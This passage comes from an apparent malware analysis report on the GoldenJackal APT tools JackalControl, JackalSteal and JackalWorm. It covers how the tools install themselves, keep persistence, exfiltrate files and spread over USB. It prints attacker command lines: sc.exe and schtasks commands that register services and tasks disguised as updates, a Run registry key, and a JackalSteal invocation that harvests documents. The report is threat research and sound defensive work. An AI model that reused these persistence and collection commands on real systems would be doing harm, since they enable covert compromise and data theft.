format.</p> <h3 id="installer-mode">Installer mode</h3> <p><a name="Installer_mode"></a>Some variants can infect the system, creating a copy of the malware in a specific location and guaranteeing its persistence.</p> <p>The malware location is selected with a specific procedure. It enumerates all subdirectories in CommonApplicationData and randomly selects one to which its copy will be saved. The generated file name will be suffixed with the subdirectory&#8217;s names and appended with another static value, Launcher.exe, as outlined below:</p> <div id="crayon-67b40d9467992775197148" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> Selected directory: C:\ProgramData\Windows App Certification Kit Launcher Malware copy: "C:\ProgramData\Windows App Certification Kit Launcher\WindowsAppCertificationKitLauncher.exe"</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="hide"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67b40d9467992775197148-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d9467992775197148-2">2</div><div class="crayon-num" data-line="crayon-67b40d9467992775197148-3">3</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67b40d9467992775197148-1"><span class="crayon-e">Selected </span><span class="crayon-i">directory</span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-i">C</span><span class="crayon-sy">:</span><span class="crayon-sy">\</span><span class="crayon-i">ProgramData</span><span class="crayon-sy">\</span><span class="crayon-e">Windows </span><span class="crayon-e">App </span><span class="crayon-e">Certification </span><span class="crayon-e">Kit </span><span class="crayon-e">Launcher</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d9467992775197148-2"><span class="crayon-e">Malware </span><span class="crayon-i">copy</span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-s">"C:\ProgramData\Windows App Certification Kit</span></div><div class="crayon-line" id="crayon-67b40d9467992775197148-3"><span class="crayon-s">Launcher\WindowsAppCertificationKitLauncher.exe"</span></div></div></td> </tr> </table> </div> </div><p> If the operation succeeds, it also changes the new file timestamp and makes it the same as that of the selected subdirectory.</p> <p>If the operation fails, it randomly selects another directory and tries again to copy the malware.</p> <p>If the operation fails with all subdirectories, it tries to use a list of hard-coded directory names:</p> <ul> <li>Google</li> <li>Viber</li> <li>AdGuard</li> <li>WinZip</li> <li>WinRAR</li> <li>Adobe</li> <li>CyberLink</li> <li>Intel</li> </ul> <p>If all the previous attempts fail, it tries to use the same procedure in the following locations:</p> <ul> <li>ApplicationData</li> <li>LocalApplicationData</li> <li>Temp</li> </ul> <h4 class="" id="persistence">Persistence</h4> <p>The malware&#8217;s persistence is usually guaranteed with one of the following mechanisms:</p> <ul> <li>Service installation</li> <li>Creation of a new Windows registry key value</li> <li>Creation of a new scheduled task.</li> </ul> <p>The service is usually installed by the malware with the execution of the Windows sc.exe utility.</p> <div id="crayon-67b40d9467993744126675" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> sc create "[MALWARE_NAME_NO_EXT]" binpath= "[MALWARE_FULL_PATH]" /[ARGUMENT]" displayname= "WORKPATH" type= own start= auto sc description "[MALWARE_NAME_NO_EXT]" "This service keeps your installation up to date with the latest enhancements and security fixes." sc start "[MALWARE_NAME_NO_EXT]"</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="hide"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67b40d9467993744126675-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d9467993744126675-2">2</div><div class="crayon-num" data-line="crayon-67b40d9467993744126675-3">3</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d9467993744126675-4">4</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67b40d9467993744126675-1"><span class="crayon-e">sc </span><span class="crayon-i">create</span><span class="crayon-h"> </span><span class="crayon-s">"[MALWARE_NAME_NO_EXT]"</span><span class="crayon-h"> </span><span class="crayon-i">binpath</span>=<span class="crayon-h"> </span><span class="crayon-s">"[MALWARE_FULL_PATH]"</span><span class="crayon-h"> </span>/<span class="crayon-sy">[</span><span class="crayon-i">ARGUMENT</span><span class="crayon-sy">]</span><span class="crayon-s">"</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d9467993744126675-2"><span class="crayon-s">displayname= "</span><span class="crayon-i">WORKPATH</span><span class="crayon-s">" type= own start= auto</span></div><div class="crayon-line" id="crayon-67b40d9467993744126675-3"><span class="crayon-s">sc description "</span><span class="crayon-sy">[</span><span class="crayon-i">MALWARE_NAME_NO_EXT</span><span class="crayon-sy">]</span><span class="crayon-s">" "</span><span class="crayon-r">This</span><span class="crayon-h"> </span><span class="crayon-e">service </span><span class="crayon-e">keeps </span><span class="crayon-e">your </span><span class="crayon-e">installation </span><span class="crayon-e">up </span><span class="crayon-st">to</span><span class="crayon-h"> </span><span class="crayon-e">date </span><span class="crayon-e">with </span><span class="crayon-e">the </span><span class="crayon-e">latest </span><span class="crayon-e">enhancements </span><span class="crayon-st">and</span><span class="crayon-h"> </span><span class="crayon-e">security </span><span class="crayon-i">fixes</span><span class="crayon-sy">.</span><span class="crayon-s">"</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d9467993744126675-4"><span class="crayon-s">sc start "</span><span class="crayon-sy">[</span><span class="crayon-i">MALWARE_NAME_NO_EXT</span><span class="crayon-sy">]</span>"</div></div></td> </tr> </table> </div> </div><p> The registry value is equal to the copied malware file name, without the extension, and is stored under the following key:</p> <div id="crayon-67b40d9467995879234650" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Value name: "[MALWARE_NAME_NO_EXT]" Value data: "[MALWARE_FULL_PATH] [ARGUMENT]"</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="hide"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67b40d9467995879234650-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d9467995879234650-2">2</div><div class="crayon-num" data-line="crayon-67b40d9467995879234650-3">3</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67b40d9467995879234650-1"><span class="crayon-i">Key</span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-i">HKCU</span><span class="crayon-sy">\</span><span class="crayon-i">Software</span><span class="crayon-sy">\</span><span class="crayon-i">Microsoft</span><span class="crayon-sy">\</span><span class="crayon-i">Windows</span><span class="crayon-sy">\</span><span class="crayon-i">CurrentVersion</span><span class="crayon-sy">\</span><span class="crayon-e">Run</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d9467995879234650-2"><span class="crayon-e">Value </span><span class="crayon-i">name</span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-s">"[MALWARE_NAME_NO_EXT]"</span></div><div class="crayon-line" id="crayon-67b40d9467995879234650-3"><span class="crayon-e">Value </span><span class="crayon-i">data</span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-s">"[MALWARE_FULL_PATH] [ARGUMENT]"</span></div></div></td> </tr> </table> </div> </div><p> The scheduled task is created using a hard-coded XML template that is modified at runtime and dropped in the file system using the same malware file path, but with a different extension, .xml instead of .exe.</p> <p>The generated XML file is then used with the Windows schtasks.exe utility to create the task.</p> <p>For example:</p> <div id="crayon-67b40d9467997384882399" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> schtasks.exe /create /f /tn "Adobe Update" /xml "C:\ProgramData\Adobe\adobeupd.xml"</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="hide"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67b40d9467997384882399-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d9467997384882399-2">2</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67b40d9467997384882399-1"><span class="crayon-i">schtasks</span><span class="crayon-sy">.</span><span class="crayon-i">exe</span><span class="crayon-h"> </span>/<span class="crayon-i">create</span><span class="crayon-h"> </span>/<span class="crayon-i">f</span><span class="crayon-h"> </span>/<span class="crayon-i">tn</span><span class="crayon-h"> </span><span class="crayon-s">"Adobe Update"</span><span class="crayon-h"> </span>/<span class="crayon-i">xml</span><span class="crayon-h"> </span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d9467997384882399-2"><span class="crayon-s">"C:\ProgramData\Adobe\adobeupd.xml"</span></div></div></td> </tr> </table> </div> </div><p> The task and service description change according to the variant.</p> <h2 id="jackalsteal">JackalSteal</h2> <p>JackalSteal is another implant usually deployed on a few compromised machines that is used to find files of interest on the target&#8217;s system and exfiltrate them to the C2 server.</p> <p>This tool can be used to monitor removable USB drives, remote shares, and all logical drives in the targeted system. The malware can work as a standard process or as a service. It cannot maintain persistence, so it must be installed by another component.</p> <p>JackalSteal starts its execution by parsing the arguments.</p> <table width="100%"> <tbody> <tr> <td style="background-color: #a5a5a5;padding-left: 10px" width="15%"><strong>Option</strong></td> <td style="background-color: #a5a5a5" width="85%"><strong>Description</strong></td> </tr> <tr> <td style="padding-left: 10px"><strong>-n</strong></td> <td>a unique identifier value for the configured profile</td> </tr> <tr> <td style="padding-left: 10px"><strong>-p</strong></td> <td>directory path to inspect</td> </tr> <tr> <td style="padding-left: 10px"><strong>-s</strong></td> <td>maximum size of requested files</td> </tr> <tr> <td style="padding-left: 10px"><strong>-d</strong></td> <td>number of days since the last write of the requested files</td> </tr> <tr> <td style="padding-left: 10px"><strong>-m</strong></td> <td>a comma-separated list of string masks to look for using a regular expression within the configured directory</td> </tr> <tr> <td style="padding-left: 10px"><strong>-w</strong></td> <td>time interval in seconds between consecutive directory scans for the configured profile</td> </tr> <tr> <td style="padding-left: 10px"><strong>-e</strong></td> <td>exclude path from the scanning activities</td> </tr> <tr> <td style="padding-left: 10px"><strong>/0</strong></td> <td>run as standard process</td> </tr> <tr> <td style="padding-left: 10px"><strong>/1</strong></td> <td>run as a service</td> </tr> </tbody> </table> <p>These options allow the attacker to specify the &#8216;profile&#8217;, which defines what files are of interest to the attackers. The profile consists of an ID and a list of patterns. Each pattern contains a list of options with the following properties:</p> <table width="100%"> <tbody> <tr> <td style="background-color: #a5a5a5;padding-left: 10px" width="15%"><strong>Property</strong></td> <td style="background-color: #a5a5a5" width="85%"><strong>Description</strong></td> </tr> <tr> <td style="padding-left: 10px"><strong>Path</strong></td> <td>target paths</td> </tr> <tr> <td style="padding-left: 10px"><strong>credentials</strong></td> <td>user and password used to access a remote share</td> </tr> <tr> <td style="padding-left: 10px"><strong>Masks</strong></td> <td>string with wildcard and mask characters that can be used to match any set of files using a regular expression</td> </tr> <tr> <td style="padding-left: 10px"><strong>MaxSize</strong></td> <td>maximum size of a file</td> </tr> <tr> <td style="padding-left: 10px"><strong>Days</strong></td> <td>the number of days since the file was last written</td> </tr> <tr> <td style="padding-left: 10px"><strong>Interval</strong></td> <td>the time interval between two consecutive path scans</td> </tr> <tr> <td style="padding-left: 10px"><strong>Exclude</strong></td> <td>paths that must be excluded during scanning activities</td> </tr> </tbody> </table> <p>The command used to configure the JackalSteal component is as follows:</p> <div id="crayon-67b40d9467998666426436" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-mixed-highlight" title="Contains Mixed Languages"></span><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> %TEMP%\\setup01.exe -p all -p usb -e Windows -e \"Program Files*\" -e ProgramData -e Users\\*\\AppData -e *\\AppData -s 15 -d 30 -w 3600 -m *.doc,*.docx,*.pdf,*.jpg,*.png,*.tif,*.tiff,*.txt,*.ppt,*.pptx,*.xls,*.xlsx -n 48df302a44c392eb</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="hide"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67b40d9467998666426436-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d9467998666426436-2">2</div><div class="crayon-num" data-line="crayon-67b40d9467998666426436-3">3</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d9467998666426436-4">4</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67b40d9467998666426436-1"><span class="crayon-ta">%</span><span class="crayon-i">TEMP</span><span class="crayon-sy">%</span><span class="crayon-sy">\</span><span class="crayon-sy">\</span><span class="crayon-i">setup01</span><span class="crayon-sy">.</span><span class="crayon-i">exe</span><span class="crayon-h"> </span>-<span class="crayon-i">p</span><span class="crayon-h"> </span><span class="crayon-i">all</span><span class="crayon-h"> </span>-<span class="crayon-i">p</span><span class="crayon-h"> </span><span class="crayon-i">usb</span><span class="crayon-h"> </span>-<span class="crayon-i">e</span><span class="crayon-h"> </span><span class="crayon-i">Windows</span><span class="crayon-h"> </span>-<span class="crayon-i">e</span><span class="crayon-h"> </span><span class="crayon-sy">\</span>"<span class="crayon-i">Program</span><span class="crayon-h"> </span><span class="crayon-i">Files</span>*<span class="crayon-sy">\</span>"<span class="crayon-h"> </span>-<span class="crayon-i">e</span><span class="crayon-h"> </span><span class="crayon-i">ProgramData</span><span class="crayon-h"> </span>-<span class="crayon-i">e</span><span class="crayon-h"> </span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d9467998666426436-2">&nbsp;</div><div class="crayon-line" id="crayon-67b40d9467998666426436-3"><span class="crayon-i">Users</span><span class="crayon-sy">\</span><span class="crayon-sy">\</span>*<span class="crayon-sy">\</span><span class="crayon-sy">\</span><span class="crayon-i">AppData</span><span class="crayon-h"> </span>-<span class="crayon-e ">e *</span><span class="crayon-sy">\</span><span class="crayon-sy">\</span><span class="crayon-i">AppData</span><span class="crayon-h"> </span>-<span class="crayon-i">s</span><span class="crayon-h"> </span><span class="crayon-cn">15</span><span class="crayon-h"> </span>-<span class="crayon-i">d</span><span class="crayon-h"> </span><span class="crayon-cn">30</span><span class="crayon-h"> </span>-<span class="crayon-i">w</span><span class="crayon-h"> </span><span class="crayon-cn">3600</span><span class="crayon-h"> </span>-<span class="crayon-e ">m </span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d9467998666426436-4"><span class="crayon-e ">*</span><span class="crayon-sy">.</span><span class="crayon-i">doc</span><span class="crayon-sy">,</span>*<span class="crayon-sy">.</span><span class="crayon-i">docx</span><span class="crayon-sy">,</span>*<span class="crayon-sy">.</span><span class="crayon-i">pdf</span><span class="crayon-sy">,</span>*<span class="crayon-sy">.</span><span class="crayon-i">jpg</span><span class="crayon-sy">,</span>*<span class="crayon-sy">.</span><span class="crayon-i">png</span><span class="crayon-sy">,</span>*<span class="crayon-sy">.</span><span class="crayon-i">tif</span><span class="crayon-sy">,</span>*<span class="crayon-sy">.</span><span class="crayon-i">tiff</span><span class="crayon-sy">,</span>*<span class="crayon-sy">.</span><span class="crayon-i">txt</span><span class="crayon-sy">,</span>*<span class="crayon-sy">.</span><span class="crayon-i">ppt</span><span class="crayon-sy">,</span>*<span class="crayon-sy">.</span><span class="crayon-i">pptx</span><span class="crayon-sy">,</span>*<span class="crayon-sy">.</span><span class="crayon-i">xls</span><span class="crayon-sy">,</span>*<span class="crayon-sy">.</span><span class="crayon-i">xlsx</span><span class="crayon-h"> </span>-<span class="crayon-i">n</span><span class="crayon-h"> </span><span class="crayon-cn">48df302a44c392eb</span></div></div></td> </tr> </table> </div> </div><p> The unique identifier &#8220;–n&#8221; is usually the same BOT_ID generated by the JackalControl Trojan.</p> <p>After argument processing, the malware serializes the data in an XML, encrypts them with DES using a key generated from the ID passed with the &#8220;-n&#8221; option and stores the resulting payload in the following location: &#8220;%ApplicationData%\SNMP\cache\%Filename%&#8221;, where %Filename% is a GUID generated from an MD5 of the unique identifier specified by the attacker.</p> <p>The malware is usually executed with the &#8220;/0&#8221; or &#8220;/1&#8221; option and the &#8220;-n&#8221; option, which is used to load the obtained profile ID. In the second case, it loads the profile from the previously mentioned location and it starts the &#8216;Watchers&#8217;.</p> <p>A Watcher is an object defined in a class with the same name that runs in a different thread and scans the location according to the specified options. The pattern could represent:</p> <ul> <li>a simple path in the local filesystem;</li> <li>a path on a remote share;</li> <li>constant string all;</li> <li>constant string usb.</li> </ul> <p>When the pattern equals &#8216;all&#8217;, the malware enumerates all logical drives, and for each one it creates a new Watcher object. When the pattern is &#8216;usb&#8217;, it listens for system events corresponding to the action of creating a new removable drive on the system. When a new drive is detected, it creates a new Watcher object.</p> <p>Every time a new Watcher is added, the malware notifies the log of the event and sends the information to the remote C2 using HTTP Post requests.</p> <p>The log is created using the following string as a template:</p> <p><code>Path: {0}{1}\r\nMasks: {2}\r\nExclude: {3}\r\nDays: {4}\r\nMaxSize: {5}\r\nInterval: {6}</code></p> <p>And is uploaded inside an encrypted payload that contains the following information:</p> <p><code>|&lt;AES_Key,AES_IV&gt;&lt;Agent_id\\%yyyyMMddHHmmssfff%.log&gt;&lt;Log content&gt;|</code></p> <p>The AES_Key and AES_IV are generated for each request and are encrypted with the RSA algorithm using a key embedded in the code. The resulting payload is also compressed with the GZIP algorithm.</p> <p>The Agent_id\\Log_path.log and the Log content data are encrypted with the AES algorithm and compressed with GZIP.</p> <p>The Watcher objects are responsible for scanning activities. When a Watcher starts, it enumerates all files in the directory and its subdirectories. The scanner can also resolve the .lnk links. When the scanner detects a file that matches the defined properties (mask, days, max size, not in exclusions), it calculates the file content hash, checks if the resulting value is present in a hash table stored in the local cache directory and adds the value if not present. When a new file is detected, the malware uploads the file and the related filepath inside an encrypted payload using the same logic described above.</p> <p>In this case, the encrypted payload contains the following information:</p> <p><code>|&lt;AES_Key,AES_IV&gt;&lt;Agent_id\\Local_file_path&gt;&lt;File content&gt;|</code></p> <p>The Agent_id\\Local_file_path and the File content data are encrypted with the AES algorithm and compressed with GZIP.</p> <h2 id="jackalworm">JackalWorm</h2> <p>This worm was developed to spread and infect systems using removable USB drives. The program was designed as a flexible tool that can be used to infect systems with any malware.</p> <p>Its behavior changes according to the parent process.</p> <p>When the malware is working on a system that is already infected and the parent process is taskeng.exe or services.exe:</p> <ol> <li>Monitors removable USB drives</li> <li>When a device is attached, hides the last-modified directory and replaces it with a copy of the worm</li> </ol> <p>The code used to monitor removable USB drives is the same one observed in JackalSteal. It creates a ManagementEventWatcher object, which allows it to subscribe to event notifications that correspond to a given WQL query and the issuing of a callback upon their interception. The query used by the malware instructs the system to check for a logical removable disk creation event every five seconds:</p> <div id="crayon-67b40d9467999532345581" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> select * from __InstanceCreationEvent within 5 where TargetInstance ISA 'Win32_LogicalDisk' and TargetInstance.DriveType = 2</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="hide"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67b40d9467999532345581-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d9467999532345581-2">2</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67b40d9467999532345581-1"><span class="crayon-e ">select *</span><span class="crayon-h"> </span><span class="crayon-e">from </span><span class="crayon-e">__InstanceCreationEvent </span><span class="crayon-i">within</span><span class="crayon-h"> </span><span class="crayon-cn">5</span><span class="crayon-h"> </span><span class="crayon-e">where </span><span class="crayon-e">TargetInstance </span><span class="crayon-i">ISA</span><span class="crayon-h"> </span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d9467999532345581-2"><span class="crayon-s">'Win32_LogicalDisk'</span><span class="crayon-h"> </span><span class="crayon-st">and</span><span class="crayon-h"> </span><span class="crayon-i">TargetInstance</span><span class="crayon-sy">.</span><span class="crayon-i">DriveType</span><span class="crayon-h"> </span>=<span class="crayon-h"> </span><span class="crayon-cn">2</span></div></div></td> </tr> </table> </div> </div><p> When the malware detects a removable USB storage device, it will copy itself onto it. The path it will copy to is determined by listing all directories and selecting the one that was modified last. It will create a copy of itself on the drive root using the same directory name and change the directory&#8217;s attribute to &#8220;hidden&#8221;. This will result in the actual directory being hidden and replaced with a copy of the malware with the directory name. Moreover, JackalWorm uses an icon mimicking a Windows directory, tricking the user into executing the malware when trying to access a directory.</p> <p>In the following example, the removable drive &#8220;E:&#8221; was infected by the malware, which copied itself as Folder1.exe and changed the attributes of Folder1 to hide it:</p> <p style="text-align: center"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16221605/GoldenJackal_APT_10.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-109717" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16221605/GoldenJackal_APT_10.png" alt="Infected device" width="494" height="280" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16221605/GoldenJackal_APT_10.png 494w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16221605/GoldenJackal_APT_10-300x170.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16221605/GoldenJackal_APT_10-309x175.png 309w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16221605/GoldenJackal_APT_10-370x210.png 370w" sizes="auto, (max-width: 494px) 100vw, 494px" /></a></p> <p style="text-align: center"><strong><em>Infected device</em></strong></p> <p>When the malware starts on a clean system and the parent process is explorer.exe and the file is located in a removable drive the behavior is as follows:</p> <ol> <li>Opens the hidden directory</li> <li>Performs the actions specified in the configuration files</li> <li>Infects the system with the worm</li> </ol> <p>The configuration files are embedded resources that contain XML data that can be used to instruct the worm to perform some actions:</p> <ul> <li>Drop a program and guarantee its persistence with a scheduled task</li> <li>Drop a program and execute it with the specified arguments</li> <li>Execute an existing program with the specified arguments</li> </ul> <p>A valid configuration file looks like this:</p> <div id="crayon-67b40d946799b638886407" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div 